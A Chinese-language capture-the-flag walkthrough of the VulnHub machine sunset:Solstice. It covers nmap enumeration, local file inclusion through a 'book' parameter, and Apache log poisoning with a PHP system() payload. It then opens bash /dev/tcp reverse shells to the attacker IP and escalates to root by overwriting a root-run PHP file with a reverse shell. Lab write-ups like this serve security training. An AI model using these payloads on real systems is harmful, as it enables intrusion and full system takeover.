sunset:Solstice

https://www.vulnhub.com/entry/sunset-solstice,499/

1，将两台虚拟机网络连接都改为NAT模式

2，攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182，靶场IP192.168.23.244

3，对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.244

1. FTP服务分析（21/tcp, 2121/tcp, 62524/tcp）

pyftpdlib 1.5.6 (21/tcp, 2121/tcp):

• 匿名登录允许（2121端口）：尝试登录 ftp://192.168.23.244:2121 用户名为 anonymous，空密码。
• 检查 pub 目录：ls -al 查看权限和文件。若可写，可上传反向Shell或测试文件。
• 搜索漏洞：pyftpdlib 1.5.6 是否存在已知漏洞（如CVE-2021-30800）。

FreeFloat ftpd 1.00 (62524/tcp):

• 旧版本，可能存在缓冲区溢出漏洞（如CVE-2010-4221）。使用 searchsploit freefloat 查找EXP。

2. SSH服务分析（22/tcp）

OpenSSH 7.9p1:

• 检查版本是否有已知漏洞（如CVE-2021-41617），但该版本较新，可能已修复。
• 若获取凭证，可尝试登录。或通过其他服务（如FTP/SMB）泄露的凭证进行爆破。

3. SMTP服务分析（25/tcp）

Exim smtpd:

• 使用 smtp-user-enum 或手动命令枚举用户：
  telnet 192.168.23.244 25
  VRFY root      # 测试是否存在用户
• 检查CVE-2019-15846（Exim 4.92.1以下远程代码执行），但需确认版本是否受影响。

4. HTTP服务分析（80/tcp, 8593/tcp, 54787/tcp）

Apache 2.4.38 (80/tcp):

• 访问 http://192.168.23.244，检查页面内容。
• 使用目录枚举工具：
  gobuster dir -u http://192.168.23.244 -w /usr/share/wordlists/dirbuster/common.txt

PHP cli服务器 (8593/tcp, 54787/tcp):

• 访问 http://192.168.23.244:8593 和 http://192.168.23.244:54787，检查应用功能。
• 检查PHP版本漏洞（7.3.14），如反序列化、文件包含（?page=../../etc/passwd）。

5. SMB服务分析（139/tcp, 445/tcp）

Samba 4.9.5-Debian:

• 枚举共享和用户：
  smbclient -L 192.168.23.244 -N
  enum4linux -a 192.168.23.244
• 检查匿名访问共享：
  smbclient \\\\192.168.23.244\\[sharename] -N
• 测试CVE-2017-7494（Samba远程代码执行），但需配置允许写入共享。

6. Squid代理分析（3128/tcp）

Squid 4.6:

• 测试代理是否开放：
  curl -x http://192.168.23.244:3128 Example Domain
• 若可用，用于扫描内网或访问受限资源。

 

4，21端口的ftp服务器登录失败，登录2121端口的ftp服务器成功

ftp 192.168.23.244

ftp 192.168.23.244 2121

再看看web服务的几个端口

http://192.168.23.244/

http://192.168.23.244:8593/

http://192.168.23.244:54787/

5，经过测试这个网站存在本地文件包含漏洞

http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd

那么就需要把这个本地文件包含漏洞利用起来，然后getshell。正好能够包含

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log

使用nc污染日志

echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80

访问文件包含网页确定漏洞是否利用成功

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id

漏洞利用成功，成功执行了系统命令，接下来构造命令反弹shell（需要URL编码）

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A

使用kali接收来自靶机的shell

6，信息收集一下

uname -a

cat /etc/*-release

getconf LONG_BIT

搜索一下root用户可读可写的可执行文件

find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

查看一下这个文件

cat /var/tmp/sv/index.php

查看一下进程

ps -ef | grep "/var/tmp/sv"

发现有一个进程使用php解释器执行/var/tmp/sv，使用ehco写入木马构造恶意php文件

echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php

cat /var/tmp/sv/index.php

靶机上通过nc访问运行这个进程的57端口，并请求/index.php文件

cd /tmp

curl localhost:57

然后kali开启对8888端口的监听

nc -lvvp 8888

成功提权成为root用户，拿到flag